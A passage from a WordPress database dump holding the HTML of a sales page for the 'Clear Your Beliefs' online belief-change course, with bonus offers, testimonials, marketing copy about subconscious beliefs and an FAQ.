size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies, and from the comfort of your own home. Each class session helps you learn specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes plus two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they have had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 21:16:11', '2014-06-18 02:16:11', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1000, 4194, '2014-06-17 21:31:49', '2014-06-18 02:31:49', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are 